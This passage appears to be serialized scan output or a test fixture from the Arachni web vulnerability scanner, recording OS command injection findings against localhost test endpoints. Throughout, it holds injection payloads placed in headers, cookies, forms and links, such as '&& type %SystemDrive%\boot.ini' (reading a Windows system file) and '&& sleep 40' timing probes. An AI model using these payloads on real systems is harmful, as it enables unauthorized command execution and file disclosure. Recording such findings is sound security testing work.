OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
:match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! ' type %SystemDrive%\\boot.ini'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user type %SystemDrive%\\boot.ini
:injected: arachni_user type %SystemDrive%\\boot.ini
:combo:
User-Agent: arachni_user type %SystemDrive%\\boot.ini
:action: http://localhost:12305/windows/header/append
:verification:
:id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
var: User-Agent
url: http://localhost:12305/windows/header/append
injected: arachni_user type %SystemDrive%\\boot.ini
id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
elem: header
remarks: {}
method: GET
response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating
systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP
Professional\" /fastdetect\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user type %SystemDrive%\\boot.ini
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjAy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTo0MCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: User-Agent
url: http://localhost:12305/windows/header/straight
elem: header
method: GET
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
:match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
:substring:
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
- 2
:injected_orig: ! '&& type %SystemDrive%\\boot.ini'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! '&& type %SystemDrive%\\boot.ini'
:injected: ! '&& type %SystemDrive%\\boot.ini'
:combo:
User-Agent: ! '&& type %SystemDrive%\\boot.ini'
:action: http://localhost:12305/windows/header/straight
:verification:
:id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
var: User-Agent
url: http://localhost:12305/windows/header/straight
injected: ! '&& type %SystemDrive%\\boot.ini'
id: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
regexp_match: \ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n
elem: header
remarks: {}
method: GET
response: ! '["[boot loader]\ntimeout=30\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\WINDOWS\n[operating
systems]\nmulti(0)disk(0)rdisk(0)partition(1)\\WINDOWS=\"Microsoft Windows XP
Professional\" /fastdetect\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! '&& type %SystemDrive%\\boot.ini'
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjAy
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMTozOTo0MyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Operating system command injection
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands."
tags:
- os
- command
- code
- injection
- regexp
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection
variations: []
internal_modname: OSCmdInjection
internal_modname: OSCmdInjection
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:10769/linux/form/straight
elem: form
method: POST
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' sleep 40'
:follow_location: true
:injected: ! ' sleep 40'
:combo:
!binary "aW5wdXQ=": ! ' sleep 40'
:action: http://localhost:10769/linux/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:10769/linux/form/straight
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:10769/linux/link/straight?input=default
elem: link
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' sleep 40'
:follow_location: true
:injected: ! ' sleep 40'
:combo:
!binary "aW5wdXQ=": ! ' sleep 40'
:action: http://localhost:10769/linux/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:10769/linux/link/straight?input=default
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: cookie
url: http://localhost:10769/linux/cookie/straight
elem: cookie
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' sleep 40'
:injected: ! ' sleep 40'
:combo:
!binary "Y29va2ll": ! ' sleep 40'
:action: http://localhost:10769/linux/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:10769/linux/cookie/straight
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=+sleep+40
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: User-Agent
url: http://localhost:10769/linux/header/straight
elem: header
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! '&& sleep __TIME__'
:skip_orig: true
:injected_orig: ! '&& sleep 40'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! '&& sleep 40'
:injected: ! '&& sleep 40'
:combo:
User-Agent: ! '&& sleep 40'
:action: http://localhost:10769/linux/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:10769/linux/header/straight
injected: ! '&& sleep 40'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! '&& sleep 40'
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:10769/bsd/form/straight
elem: form
method: POST
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' sleep 40'
:follow_location: true
:injected: ! ' sleep 40'
:combo:
!binary "aW5wdXQ=": ! ' sleep 40'
:action: http://localhost:10769/bsd/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:10769/bsd/form/straight
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:10769/bsd/link/straight?input=default
elem: link
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ! ' sleep 40'
:follow_location: true
:injected: ! ' sleep 40'
:combo:
!binary "aW5wdXQ=": ! ' sleep 40'
:action: http://localhost:10769/bsd/link/straight?input=default
:silent: true
:regexp: ''
var: input
url: http://localhost:10769/bsd/link/straight?input=default
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: link
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: cookie
url: http://localhost:10769/bsd/cookie/straight
elem: cookie
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ! ' sleep 40'
:injected: ! ' sleep 40'
:combo:
!binary "Y29va2ll": ! ' sleep 40'
:action: http://localhost:10769/bsd/cookie/straight
:silent: true
:regexp: ''
var: cookie
url: http://localhost:10769/bsd/cookie/straight
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: cookie
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=+sleep+40
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: User-Agent
url: http://localhost:10769/bsd/header/straight
elem: header
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! '&& sleep __TIME__'
:skip_orig: true
:injected_orig: ! '&& sleep 40'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ! '&& sleep 40'
:injected: ! '&& sleep 40'
:combo:
User-Agent: ! '&& sleep 40'
:action: http://localhost:10769/bsd/header/straight
:silent: true
:regexp: ''
var: User-Agent
url: http://localhost:10769/bsd/header/straight
injected: ! '&& sleep 40'
id:
regexp: ''
regexp_match:
elem: header
remarks: {}
method: GET
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ! '&& sleep 40'
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:10769/solaris/form/straight
elem: form
method: POST
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
:skip_orig: true
:injected_orig: ! ' sleep 40'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! ' sleep 40'
:follow_location: true
:injected: ! ' sleep 40'
:combo:
!binary "aW5wdXQ=": ! ' sleep 40'
:action: http://localhost:10769/solaris/form/straight
:silent: true
:regexp: ''
var: input
url: http://localhost:10769/solaris/form/straight
injected: ! ' sleep 40'
id:
regexp: ''
regexp_match:
elem: form
remarks: {}
method: POST
response: ''
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value
response: {}
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations: []
internal_modname: OSCmdInjectionTiming
internal_modname: OSCmdInjectionTiming
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
var: input
url: http://localhost:10769/solaris/link/straight?input=default
elem: link
method: GET
name: Operating system command injection (timing attack)
description: ! "The web application allows an attacker to\n execute arbitrary
OS commands even though it does not return\n the command output in the HTML
body.\n (This issue was discovered using a timing attack; timing attacks\n
\ can result in false positives in cases where the server takes\n an abnormally
long time to respond.\n Either case, these issues will require further investigation\n
\ even if they are false positives.)"
tags:
- os
- command
- code
- injection
- timing
- blind
cwe: '78'
cwe_url: http://cwe.mitre.org/data/definitions/78.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as OS level commands."
remedy_code: ''
metasploitable: unix/webapp/arachni_exec
mod_name: OS command injection (timing)
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
OWASP: http://www.owasp.org/index.php/OS_Command_Injection
opts:
:redundant: false
:async: true
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 1
:timeout: 28000.0
:timeout_divider: 1000
:timing_string: ! ' sleep __TIME__'
